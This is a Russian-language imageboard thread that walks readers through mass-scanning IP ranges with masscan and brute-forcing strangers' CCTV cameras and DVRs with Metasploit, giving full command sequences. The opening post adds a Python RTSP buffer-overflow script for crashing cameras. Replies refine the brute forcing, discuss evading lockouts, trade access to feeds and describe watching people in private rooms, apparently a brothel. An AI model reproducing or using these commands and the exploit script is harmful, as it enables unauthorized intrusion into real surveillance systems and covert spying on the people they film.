В этом треде восстанавливаем пароли видеорегистраторов и IP камер CCTV Нам понадобиться:Kali Linux https://www.kali.org/downloads/Или PentestBox with Metasploit для Windowshttps://pentestbox.orgПО для просмотра на Андроиде, Винде, Маке и т.д.http://www.cctvcamerapros.com/Viewtron-Video-Surveillance-DVR-s/654.htm#software1) Качается IP_CIDR блоки http://www.ipaddresslocation.org/ip_ranges/get_ranges.php Для своей страныили создаем с помощью Masscan список IP адресов.masscan --ports 5920 -iL IPrange.txt --rate=50000 -oX CCTV.xmlФильтруем онлайн все IP из текстаhttp://www.toolsvoid.com/extract-ip-addressesУдаляем онлайн дубликатыhttp://www.toolsvoid.com/duplicate-lines-remover2) Запускаем Метасплоит под виндой или линуксомmsfconsole3) сохраняем лог pool /root/cctv.log4) Выбираем модуль use auxiliary/scanner/misc/cctv_dvr_login5) Смотрим его опцииshow options6) Указываем путь к файлу CIDR блоков (тогда Метасплоит будет искать все сам) или путь к IP с уже готовыми адресамиset RHOSTS file:/opt/Country/UA_IP_CCTV.txt7) Указывает смотреть все парыset DB_ALL_CREDS true8) Указываем колличество потоковset THREADS 4 (выбирайте столько, каков ваш пинг в те адреса, можно вообще 1 поставить)9) Запускаемexploit) Можно указывать любой порт (даже от HikkVision)) Где находятся логины и пароли - смотрим в настройках!) Один украинский фашист репортит камеры Донецка и Луганска, а так же России. Я недавно наткнулся на его кукарек обиженки в группах Метасплоита. Поэтому камерами не ДЕЛИМСЯ !!!В подарок каждому Python-скрипт для вывода из строя почти любой камеры, выпущенной до 2016 года, путем перегрузки буфера, в тригер пакетах можете писать исполнение любого бинарного файла, у которого у камеры есть доступimport socket HOST = 'здесь IP адрес'PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((HOST, PORT)) trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOSTtrigger_pkt += "CSeq: 7\r\n"trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n"trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n" s.sendall(trigger_pkt)print "Packet sent"data = s.recv(1024)print 'Received', repr(data), "\r\n"s.close()
https://chrome.google.com/webstore/detail/cctv-view/oajmcmcpiboagipoflploplebgicaadj?hl=en
В настоящий момент есть модули для следующих DVRMatching Modules================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/gather/avtech744_dvr_accounts normal AVTECH 744 DVR Account Information Retrieval auxiliary/scanner/misc/cctv_dvr_login normal CCTV DVR Login Scanning Utility auxiliary/scanner/misc/dahua_dvr_auth_bypass normal Dahua DVR Auth Bypass Scanner auxiliary/scanner/misc/dvr_config_disclosure normal Multiple DVR Manufacturers Configuration Disclosure auxiliary/scanner/misc/raysharp_dvr_passwords normal Ray Sharp DVR Password Retriever exploit/linux/misc/hikvision_rtsp_bof 2014-11-19 normal Hikvision DVR RTSP Request Remote Code Execution
Если будет настроение создам для каждого брутера свой тред. В наличии есть 5 великолепных брутов, один из которых универсальный.
Masscan - единственная доверенная сборка под Винду от команды Пентестбоxhttps://github.com/PentestBox/masscan/blob/master/masscan.exeСборка дает на Винде такую же скорость, как на Линуксе
Годно
Внимание всем: Dahua нельзя брутить! После 5 неудачных попыток устройство добавляет тебя в черный лист НАВСЕГДА по MAC и подсети IP! Можно попросить показать хэши паролей и потом на локальной машине подбирать.
квартирка шлюх
1000 рублей - часзвук
Радует, что этот тип камер при бруте банит тебя и пароль админа выпросить нельзя, только восстановить хэши. Что отобьет сразу каклопидоров и толпы ньюфагов + у админ только локальный, оператор не может сменить себе пароль.
По моральным причинам, остальные 6 камер показывать не буду, сутенер приносит им еду в 12 часов, они хавают, дальше приходят клиенты.
За 1000 рублей, девка танцует, ебется, сосет, шутить, составляет досуг. Одна даже курить кальян во время ебли.
Киев невер слип
>>95128 (OP)почему вы перекатились из набегача и почему мачак потер набигач?
>>95210Лол. Ты в анабиозе был последние пару лет?
>>95215не слежу просто
>>95128 (OP)>Указываем путь к файлу CIDR блоковВот тут у меня проблема, он не видит файл. Если задавать отдельные адреса/диапазоны - все ок. А указываю расположение файла - он выдает ошибку.
>>95243Все, проблемы нет, разобрался.
>>95202>при бруте банит тебяКак тогда брутить?(((
>>95251Никак. Запросить хэш пароля у камеры, если она его отдаст, искать хэш в словаре дома.
>>95251у ССTV можешь брутить по маленькому словарю, после 256 попыток, CCTV добавляет в бан по МАКу и подсети.У Dahua 5 попыток и бан.
А если дать Метасплойту отсканить самому, он будет делать это через Масскан или другую приблуду?Kali linux если что.
>>95259Он будет делать это через nmapМожешь конечно
>>95259Осваивай уязвимости, вместо брута + есть платная версия метасплоита, там гораздо больше модулей и действий.
> 8) Указываем колличество потоков> set THREADS 4> (выбирайте столько, каков ваш пинг в те адреса, можно вообще 1 поставить)Прриграл с дебила
>>95312Даун не знает про DB_ERROR и колличество потоков, но зато как понтуется. ТЫ откуда такой вылез?
Там телнет есть на камерах?
>>95328в 30% да + один и тот же логин и пароль в зависимости от производителя.
>>95332В остальных 70% его вообще нет в прошивке или просто не запущен?
>>95340Не запущен, он есть в 100% DVR
>>95340В прошивках старше 2014 антибрут на телнете тоже, после 5 попыток у Дахуя ты не сможешь больше брутить телнет, тайм аут 24 часа, а если будешь пытаться брутить в этот период - полный бан по маку и твоей подсети.
+ есть еще умная система - защита от дурака, если ты будешь пытаться брутить локальные логины (не буду писать какие они для каждой камеры) - ты через 5 попыток ловишь бан навсегда.Кстати, это ахуенная тема, что у привилигированного юзера есть вход только с локалки, а удаленка - только у оператора (и поменять пароли нельзя через интернет)
>>95347>полный бан по маку Мак адрес - это канальный уровень, он в ip-пакетах не передаётся>и твоей подсети.у меня много проксей, лул.Да и брудить я буду только те, на которых не отработают експлоиты.
>>95203Можешь видео запилить?
http://javascript.ru/unsorted/IDТы слишком молод, и не знаешь, что Мак ОС отдаст и явасриптом даже. Подними сам свой NVR-сервер, попробуй побрутить метсплоитом и без стеснений покажи лог.Не удивляйся, если в момент подключения метасплоитом, разрядность системы будет тоже передаваться.
>>95464Не, ну че, можешь через веб-форму брутить, тоже с 5 раз )))
>>95487Кому и Зачем?
>>95464>у меня много проксей, лул.Когда у тебя будет внезапно все превращаться в TimeOutКрокодильи слезки не лей тут.
>>95497>что Мак ОС отдаст и явасриптом даже>http://javascript.ru/unsorted/IDОй, кажется ты обкакунькался.>подними сам свой NVR-сервер, попробуй побрутить метсплоитом и без стеснений покажи лог.Грамотные люди пишут брут сами себе. Причем наиболее эффективно перебирать не пароли, а ип-адреса камер, т.е. берётся допустим пара admin//admin и список из 1кк ипов-камер, далее каждый ип из списка тестируется на эту пару. Потом берется другая пара и тд.
>>95503Когда ты станешь взрослым, то поймешь, что такое писать между строк и почему скрипто-дети, вроде тебя, будут еще долго получать нихуя.>>Грамотные люди пишут брут сами себеНу и з 4 года, хоть осилили как билд из соседнего треда на mingw собрать?Дико проиграл с тебя, малыш.
>>95503>>Причем наиболее эффективно перебирать не пароли, а ип-адреса камер, т.е. берётся допустим пара admin//admin и список из 1кк ипов-камер, далее каждый ип из списка тестируется на эту пару. Потом берется другая пара и тд. set LOGINS set USERSТы не осилил, дальше можно не читать. Но внезапно.>перебирать не пароли>допустим пара admin//adminУдваиваю тебя, чтоб другие тоже посмеялись.Короче, учишься вводить в линуксе --helpА потом в местасплоите SHOW OPTIONS и SHOW ACTIONSКогда осилишь, берешь молоток и ебашишь себя по черепу.
>>9550314705086921141.pngПонимаю, что ты не видишь и для тежело в English, но ты старайся.>>95128 (OP)Саморазвитие. для тебя сейчас очень важно, а то работать продавцом в Пятерочке уже нависла для тебя, мамкин хацкер.
Смотрите, что нашел. Бентли с 999 номером.
>>95514Не благодари."Антипаркон бот"
>>95499Хочу посмотреть как клиентов страпонят.
>>>>Предлагает ставить Kali LinuxДальше без комментарией. Такая дикая жирнота.
>>95128 (OP)Автор отпиши [email protected], есть дело.
>>98413ооо, знаю эту камеру, жаль только что она слетела с того айпишника, а снова она никак не попадается в мои сети, но нечего, страна не очень большая, попадется рано или поздно
>>95128 (OP)>Нам понадобиться:>Kali Linux>Или PentestBox with Metasploit для WindowsЗачем нужен этот Kali Linux? Кому надо сами установят Metasploit Framework. Раньше был ZverCD теперь Kali Linux, пиздец. Для Windows он готовый есть http://windows.metasploit.com/metasploitframework-latest.msi без всяких Pentest Box.>ПО для просмотра на Андроиде, Винде, Маке и т.д.И где твое ПО? http://vmddns.com/download/VMDVR_VMCMS_1.0.0.32.exe — не удается получить доступ к сайту.>Для своей страныА не для своей страны нельзя?>Фильтруем онлайн все IP из текстаУноси это говно обратно. Не работает с большими объемами данных. Знающие делают так grep -E -o "([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])\.([01]?[0-9][0-9]?|2[0-4][0-9]|25[0-5])" myscan.txt > IP.txt>pool /root/cctv.logДве ошибки. Не pool а spool, путь до файла должен быть заключен в одинарные кавычки spool 'C:\metasploit-framework\bin\console.log'>set RHOSTS file:/opt/Country/UA_IP_CCTV.txtАналогично сказанному. Путь до файла должен быть заключен в одинарные кавычки.>(выбирайте столько, каков ваш пинг в те адреса, можно вообще 1 поставить)Ты че ебанутый?! У меня 10000 IP я их что все пинговать буду? А когда выяснится что пинг до всех разный тогда что? Ебать дебил…>exploitНет. runВот такие долбаебы создают треды.Чтобы модуль auxiliary/scanner/misc/cctv_dvr_login нормально работал в Metasploit Framework под Windows:spool 'C:\metasploit-framework\bin\console.log'use auxiliary/scanner/misc/cctv_dvr_loginset BLANK_PASSWORDS trueset DB_ALL_PASS trueset DB_ALL_USERS trueset RHOSTS file:'C:\metasploit-framework\bin\IP.txt'set THREADS 16run
>>99854нашел ее вновь >>98413могу поменятся
>>Зачем нужен этот Kali Linux>>Раньше был ZverCD теперь Kali Linux>>Для Windows>>Metasploit>>Windows>>ZverCD >>Metasploit>>ZverCD Давно так не смеялся. Этот школьник даже сможет в 10 класс перейти.
>>ZverCD - мультизагрузочный диск, предназначенный для установки Windows XP SP3>>Раньше был ZverCD теперь Kali Linux>>Раньше был ZverCD теперь Kali Linux>>Раньше был ZverCD теперь Kali Linux>>Раньше был ZverCD теперь Kali Linux>>Раньше был ZverCD теперь Kali LinuxЗачем я зашел в этот тред, блять пристрелите этого дебила кто-то.
>>100015>>100015Здарова Аноно, с тобой можно как нибудь связаться.
>>100088Можно. Мой email: [email protected].